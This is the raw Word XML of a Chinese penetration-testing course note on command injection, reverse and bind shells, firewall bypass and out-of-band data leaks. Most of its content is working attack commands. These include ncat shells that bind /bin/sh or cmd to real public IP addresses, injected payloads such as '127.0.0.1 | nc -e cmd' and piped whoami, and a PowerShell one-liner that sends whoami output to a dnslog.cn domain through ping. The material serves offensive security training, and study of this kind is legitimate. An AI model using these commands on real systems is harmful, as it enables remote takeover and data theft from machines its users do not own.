                        <w:t>命令生成：</w:t>
                      </w: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https://forum.ywhack.com/bountytips.php?download</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1C5B035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Linux：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wget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curl python ruby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perl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java等</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6A9CD1F0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Windows：PowerShell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Certutil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Bitsadmin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msiexec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mshta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rundll32等</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1D2EC526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264DF7EE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#实用案例2：反弹Shell命令-解决数据回显&amp;解决数据通讯</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="182D36FC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sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>命令生成：</w:t>
                      </w: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https://forum.ywhack.com/shell.php</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="19A32D01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1、正向连接：</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00E22649">
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>本地监听等待对方连接</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="24022F78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Linux</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00E22649">
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>控制</w:t>
                      </w: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Windows</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="02E3D99A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//绑定CMD到本地5566端口</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7A1F9599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-e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cmd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lvp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5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="28BB18AE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//主动连接目标5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2CAE8CA0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ncat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47.122.23.131 5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3F559F8E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52D6E4B9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Windows</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00E22649">
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>控制</w:t>
                      </w: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Linux</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="19117AC1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//绑定SH到本地5566端口</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4E9F0705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ncat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-e /bin/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sh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lvp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5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="45DD1A8A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//主动连接目标5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4E500429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47.94.236.117 5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6EBC858A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515BE782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2、反向连接：</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00E22649">
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>主动给出去，对方监听</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4DCD411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//绑定CMD到目标5566端口</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5647DC09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ncat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-e /bin/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sh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47.122.23.131 5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1DD131B1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//等待5566连接</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7D6C26C4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lvvp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5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="39183ABE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71926981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//绑定CMD到目标5566端口</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="18E67BF1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-e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cmd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47.94.236.117 5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5D2D8C9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//等待5566连接</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3778487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ncat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lvvp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5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1C81BB01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37EFD5C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#实际案例1：防火墙绕过-正向连接&amp;反向连接&amp;内网服务器</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="06E9FB68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sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>管道符：</w:t>
                      </w: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| (管道符号) ||（逻辑或） &amp;&amp;（逻辑与）  &amp;(后台任务符号)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="595E87C4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sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>Windows-&gt;</w:t>
                      </w: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| &amp; || &amp;&amp;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1A8B52E1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sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>Linux-&gt;; | || &amp; &amp;&amp; ``(特有``和;)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6DF7520F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例子：</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4413FED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ping -c 1 127.0.0.1 ;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whoami</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="4E25300A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ping -c 1 127.0.0.1 |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whoami</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="03B0BB9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ping -c 1 127.0.0.1 ||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whoami</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="2E1A308E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ping -c 1 127.0.0.1 &amp;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whoami</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="3DC58C1B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ping -c 1 127.0.0.1 &amp;&amp;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whoami</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="5E9CBD73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ping -c 1 127.0.0.1 `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whoami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`</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3E1CD638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7352FC54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1、判断windows</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="51A7287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2、windows没有自带的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</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="14C9148F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3、想办法上传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反弹权限</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="012680EE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4、反弹</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3D2CC8CF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开启入站策略，采用反向连接</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7A207654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Linux：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ncat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lvvp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5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4A68649C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Windows：127.0.0.1 |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-e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cmd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47.94.236.117 5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="21E88453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开启出站策略，采用正向连接</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="70291AD9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Linux：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ncat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-e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cmd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47.122.23.131 5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="73F7E799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Windows：127.0.0.1 |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nc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-e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cmd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-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lvvp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5566</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="087CC0A9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正反</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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向反弹</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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案例-内网服务器</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="34F7D269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sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>只能内</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00E22649">
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>网主动</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00E22649">
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>交出数据，反向连接</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="224FD6C5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6BEF0820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#实际案例2：防火墙组合数据不回显-ICMP带外查询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Dnslog</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="4C17952E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出站入站都开启策略（数据不回显）：OSI网络七层</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3FC2F2BB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127.0.0.1 |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powershell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$x=whoami;$x=$x.Replace('\','xxx');$y='.f4an93.dnslog.cn';$z=$x+$y;ping $z</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="34E6D4CA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167E0F98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7D28F542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漏洞有，但是数据不回显：</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2755EA47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1、反弹shell</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="26095EAA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2、带外查询</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5081746D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115C5D2E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确定能执行命令</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1F6F708D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windows</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="113D859A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003B1727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` ` ; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="75F3DB1A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27296D88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7B5BD0A5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ping 127.0.0.1 | </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0C604CC5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656DDABC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为什么要这样写</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="426D4ED7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cmd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无法执行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whoami</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="76766133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用到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powershell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变量赋值 把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whoami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执行结果给变量</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="367BCC3A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结果带有“\” 导致ping无法执行</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="465699B9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03542115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powershell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$x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4D85D20F" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRPr="00E22649" w:rsidRDefault="009F3DC8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</w:p>
                    <w:p w14:paraId="21D86278" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRPr="00E22649" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:pStyle w:val="melo-codeblock-Base-theme-para"/>
                        <w:rPr>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                      </w:pPr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127.0.0.1 | </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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>powershell</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00E22649">
                        <w:rPr>
                          <w:rStyle w:val="melo-codeblock-Base-theme-char"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z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F66FE9" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="009F3DC8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="thinThickThinSmallGap" w:sz="8" w:space="0" w:color="050301"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="432FDDDD" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:pP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涉及资源：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F452D" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="thinThickThinSmallGap" w:sz="8" w:space="0" w:color="030102"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:tgtFrame="dfe" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>补充：涉及录像课件资源软件包资料等下载地址</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47ED8A51" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="009F3DC8"/>
    <w:sectPr w:rsidR="009F3DC8">
      <w:pgSz w:w="11905" w:h="16838"/>
      <w:pgMar w:top="1361" w:right="1417" w:bottom="1361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夏小芸๑" w:date="2023-02-28T19:04:00Z" w:initials="">
    <w:p w14:paraId="60068B4B" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:r>
        <w:t>小迪</w:t>
      </w:r>
      <w:r>
        <w:t>yyds</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="1" w:author="ℳঞ心枯 ꦿ人亡 ໌້ᮨ꧔ꦿ᭄💕" w:date="2023-09-18T15:14:00Z" w:initials="">
    <w:p w14:paraId="761AA584" w14:textId="77777777" w:rsidR="009F3DC8" w:rsidRDefault="00000000">
      <w:r>
        <w:t>芸姐芸姐！！！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068B4B" w15:done="0"/>
  <w15:commentEx w15:paraId="761AA58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068B4B" w16cid:durableId="47E52F79"/>
  <w16cid:commentId w16cid:paraId="761AA584" w16cid:durableId="43FE234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orHAnsi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064890"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E11225EA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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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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num w:numId="1" w16cid:durableId="608201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A0"/>
    <w:rsid w:val="00002281"/>
    <w:rsid w:val="00680AC3"/>
    <w:rsid w:val="007452DF"/>
    <w:rsid w:val="009F3DC8"/>
    <w:rsid w:val="00A87503"/>
    <w:rsid w:val="00E023A0"/>
    <w:rsid w:val="00E2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B114D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0549D595-5F3E-9A49-832F-E7DF3778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norHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsi="minorHAnsi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0"/>
        <w:spacing w:before="60" w:after="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467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:r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table" w:styleId="a4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paragraph" w:styleId="a5">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="10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styleId="a6">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a7">
    <w:name w:val="批注文字 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed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hyperlink" Target="https://docs.qq.com/doc/DQ3Z6RkNpaUtMcEFr" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="comment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6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Jackie tBao</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-04T17:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-05T06:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>